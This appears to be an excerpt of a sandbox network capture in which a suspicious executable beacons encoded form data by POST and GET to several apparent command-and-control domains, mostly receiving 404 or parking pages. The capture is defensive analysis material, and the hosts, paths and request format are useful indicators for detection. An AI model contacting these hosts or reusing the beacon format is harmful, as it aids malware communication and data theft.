                                                                                                        Nov 6, 2024 08:42:11.111938000 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                        Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
Nov 6, 2024 08:42:11.111949921 CET | 1236 | IN | (hex dump omitted)
    Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
Nov 6, 2024 08:42:11.112126112 CET | 1236 | IN | (hex dump omitted)
    Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
Nov 6, 2024 08:42:11.116682053 CET | 1236 | IN | (hex dump omitted)
    Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propia p&aacute;gina web de forma profesional y de una manera r&aacute;pida y s
Nov 6, 2024 08:42:11.116700888 CET | 1236 | IN | (hex dump omitted)
    Data Ascii: </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosblock"> <span>Registro de dominios</span> <p>Te ofrecemos si
Nov 6, 2024 08:42:11.116735935 CET | 648 | IN | (hex dump omitted)
    Data Ascii: k-small.png"></div>Facebook</a> </li> <li> <a href="https://twitter.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Twitter"> <img src="https://piensasolutions.com/imgs/par


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50026 | 161.97.142.144 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:16.362225056 CET | 810 | OUT | POST /knx2/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.030002128.xyz
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 208
    Cache-Control: no-cache
    Origin: http://www.030002128.xyz
    Referer: http://www.030002128.xyz/knx2/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Ascii: DDp=Rzdl8dHhME21rNSn2Cf+tHDD0K5Fw20UDQFbH8mk45+z2ajF5buqMJqDSvOkYXAJSqQA8HYvzx+fQgx+DNjSm+43M3XOkR/q+q0IBJfVTKtvYxtavFadlXt2nNidMmJOwJXDZS/LUzSGP6bIweflOdsghzlHqRb32mFgXu6Pt85Z8P1KLOSlCC8mxFm7My4/sfggGQk+KGPp
Nov 6, 2024 08:42:17.392944098 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Nov 2024 07:42:17 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    ETag: W/"66cce1df-b96"
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (first chunk size 0x54e); hex and ASCII dump omitted
Nov 6, 2024 08:42:17.392961979 CET | 370 | IN | Data: gzip body continuation; hex and ASCII dump omitted
Nov 6, 2024 08:42:17.393080950 CET | 370 | IN | Data: gzip body continuation (same bytes as previous row); hex and ASCII dump omitted


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 50027 | 161.97.142.144 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:19.103229046 CET | 834 | OUT | POST /knx2/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.030002128.xyz
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 232
    Cache-Control: no-cache
    Origin: http://www.030002128.xyz
    Referer: http://www.030002128.xyz/knx2/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Ascii: DDp=Rzdl8dHhME21rtCn0h3+43Dcp65F5W0PDQZbH9Tp4sWz26zF4eaqFZqDaPO9bnBkSqV98DQvz1WfQhh+E8jVnu41AXXA7h/q+q0IBN3/TK1vZBdaunie+3t1gNidImJKwJXxZW+WU2WGP+XIzNHkAdtpsTkMmCup/XcAR4ztyuxc0ZoQX9SGQSckxH+JMS4VufYgUHoZFyqK4/cgnSVj4IrhXbzPxIfXmQ==
Nov 6, 2024 08:42:19.923552036 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Nov 2024 07:42:19 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    ETag: W/"66cce1df-b96"
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (first chunk size 0x54e); hex and ASCII dump omitted
Nov 6, 2024 08:42:19.923798084 CET | 370 | IN | Data: gzip body continuation; hex and ASCII dump omitted


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 50028 | 161.97.142.144 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:21.640878916 CET | 1847 | OUT | POST /knx2/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.030002128.xyz
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1244
    Cache-Control: no-cache
    Origin: http://www.030002128.xyz
    Referer: http://www.030002128.xyz/knx2/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Ascii: DDp= [TRUNCATED]
Nov 6, 2024 08:42:22.488420010 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Nov 2024 07:42:22 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    ETag: W/"66cce1df-b96"
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (first chunk size 0x54e); hex and ASCII dump omitted
Nov 6, 2024 08:42:22.488435984 CET | 370 | IN | Data: gzip body continuation; hex and ASCII dump omitted


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 50029 | 161.97.142.144 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:24.184984922 CET | 550 | OUT | GET /knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.030002128.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:42:25.010678053 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Nov 2024 07:42:24 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 2966
    Connection: close
    Vary: Accept-Encoding
    ETag: "66cce1df-b96"
    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 6, 2024 08:42:25.010694027 CET | 1236 | IN | (hex dump omitted)
    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 6, 2024 08:42:25.010711908 CET | 698 | IN | (hex dump omitted)
    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 50030 | 199.59.243.227 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:30.242670059 CET | 837 | OUT | POST /geci/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.auto-deals-cz-000.buzz
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 208
    Cache-Control: no-cache
    Origin: http://www.auto-deals-cz-000.buzz
    Referer: http://www.auto-deals-cz-000.buzz/geci/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 44 57 30 30 66 36 69 37 6f 55 49 51 53 69 5a 2f 38 55 36 62 59 61 41 46 6d 55 32 79 72 54 70 63 49 77 33 66 61 4d 4d 45 73 78 56 4c 49 71 4a 57 4d 74 6b 4e 61 5a 68 6f 72 55 74 4f 4a 51 49 31 76 52 71 41 51 4b 31 6d 30 64 6e 4f 61 51 35 44 72 39 62 4d 78 46 55 77 44 49 68 79 36 63 56 41 4e 68 4f 45 50 68 4b 6c 48 48 46 52 38 57 51 56 65 38 36 52 58 76 30 78 41 6c 5a 30 46 36 51 6b 66 5a 61 47 59 77 30 47 31 47 6c 38 78 43 42 6b 50 58 61 43 36 75 57 61 31 6b 42 73 44 32 46 4d 6e 6c 2b 49 4c 73 61 45 75 49 7a 5a 52 70 70 69 50 33 44 33 67 71 32 69 6f 45 47 2f 41 76 44 75 62 64 63 39 67 67 2b 43 50 44 4f 36
                                                                                                        Data Ascii: DDp=DW00f6i7oUIQSiZ/8U6bYaAFmU2yrTpcIw3faMMEsxVLIqJWMtkNaZhorUtOJQI1vRqAQK1m0dnOaQ5Dr9bMxFUwDIhy6cVANhOEPhKlHHFR8WQVe86RXv0xAlZ0F6QkfZaGYw0G1Gl8xCBkPXaC6uWa1kBsD2FMnl+ILsaEuIzZRppiP3D3gq2ioEG/AvDubdc9gg+CPDO6
                                                                                                        Nov 6, 2024 08:42:30.853243113 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:42:30 GMT
                                                                                                        content-type: text/html; charset=utf-8
                                                                                                        content-length: 1158
                                                                                                        x-request-id: d57c27a5-209c-4e59-bc95-0d7c82c58d5a
                                                                                                        cache-control: no-store, max-age=0
                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
                                                                                                        set-cookie: parking_session=d57c27a5-209c-4e59-bc95-0d7c82c58d5a; expires=Wed, 06 Nov 2024 07:57:30 GMT; path=/
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 57 34 43 42 6f 61 33 58 65 33 56 77 74 72 4a 4b 61 4e 46 7a 34 34 69 74 6d 57 58 66 49 47 44 38 44 57 4d 5a 34 77 5a 5a 53 47 7a 61 76 73 79 37 6f 66 76 4a 7a 49 79 64 4e 6c 4b 46 53 47 49 38 76 39 57 45 42 68 74 41 41 2f 6b 36 62 42 61 79 4f 6d 4b 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                        Nov 6, 2024 08:42:30.853271961 CET611INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDU3YzI3YTUtMjA5Yy00ZTU5LWJjOTUtMGQ3YzgyYzU4ZDVhIiwicGFnZV90aW1lIjoxNzMwODc4OT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 50031 | 199.59.243.227 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:32.796104908 CET | 861 bytes | OUT
POST /geci/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.auto-deals-cz-000.buzz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.auto-deals-cz-000.buzz
Referer: http://www.auto-deals-cz-000.buzz/geci/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp=DW00f6i7oUIQTCJ/73iba6AGp02yhzpiIwzfaO8UsDxLIL5WNskNZZhozktXXgIEvRumQIhm0dzOaVFDrOzPxVUyPoh008VANhOEPhPyHHdR8CsVfZWeeP0yHlZ0PaQgfZaoYxpt1EN8xGFkOGaBjeWY/EATKn4AgH/rBcKF+v/oZ/04TEDUy6WgoGeNAPDEZdk9y3ylA3rZMvUUJ7QfhgpYSnlAeeACzg==
Nov 6, 2024 08:42:33.416079998 CET | 1236 bytes | IN
HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:42:32 GMT
content-type: text/html; charset=utf-8
content-length: 1158
x-request-id: c5eedf0a-25aa-4adc-80bb-27a5705dd974
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
set-cookie: parking_session=c5eedf0a-25aa-4adc-80bb-27a5705dd974; expires=Wed, 06 Nov 2024 07:57:33 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 6, 2024 08:42:33.416104078 CET | 611 bytes | IN
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzVlZWRmMGEtMjVhYS00YWRjLTgwYmItMjdhNTcwNWRkOTc0IiwicGFnZV90aW1lIjoxNzMwODc4OT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 50032 | 199.59.243.227 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:35.343238115 CET | 1874 bytes | OUT
POST /geci/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.auto-deals-cz-000.buzz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.auto-deals-cz-000.buzz
Referer: http://www.auto-deals-cz-000.buzz/geci/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp= [TRUNCATED]
Nov 6, 2024 08:42:35.969959021 CET | 1236 bytes | IN
HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:42:35 GMT
content-type: text/html; charset=utf-8
content-length: 1158
x-request-id: a7000474-fca9-4b0c-94e6-83dbf10ed818
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
set-cookie: parking_session=a7000474-fca9-4b0c-94e6-83dbf10ed818; expires=Wed, 06 Nov 2024 07:57:35 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 6, 2024 08:42:35.969991922 CET | 611 bytes | IN
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTcwMDA0NzQtZmNhOS00YjBjLTk0ZTYtODNkYmYxMGVkODE4IiwicGFnZV90aW1lIjoxNzMwODc4OT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:37.893212080 CET | 559 bytes | OUT
GET /geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.auto-deals-cz-000.buzz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:42:38.519113064 CET | 1236 bytes | IN
HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:42:38 GMT
content-type: text/html; charset=utf-8
content-length: 1518
x-request-id: 45198989-4ce8-455c-b4e2-352dd1c4d277
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_axH+/K1799aoJvxPWN6oaQI68V4Fj/wRuDSyjO8F/Nk9XNyJKFUIzWYc4tbWgpSefk7jd+UVfhoy4nK3991IIw==
set-cookie: parking_session=45198989-4ce8-455c-b4e2-352dd1c4d277; expires=Wed, 06 Nov 2024 07:57:38 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_axH+/K1799aoJvxPWN6oaQI68V4Fj/wRuDSyjO8F/Nk9XNyJKFUIzWYc4tbWgpSefk7jd+UVfhoy4nK3991IIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 6, 2024 08:42:38.519882917 CET | 971 bytes | IN
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDUxOTg5ODktNGNlOC00NTVjLWI0ZTItMzUyZGQxYzRkMjc3IiwicGFnZV90aW1lIjoxNzMwODc4OT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        49192.168.2.650034188.114.97.3804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:43.581168890 CET798OUTPOST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
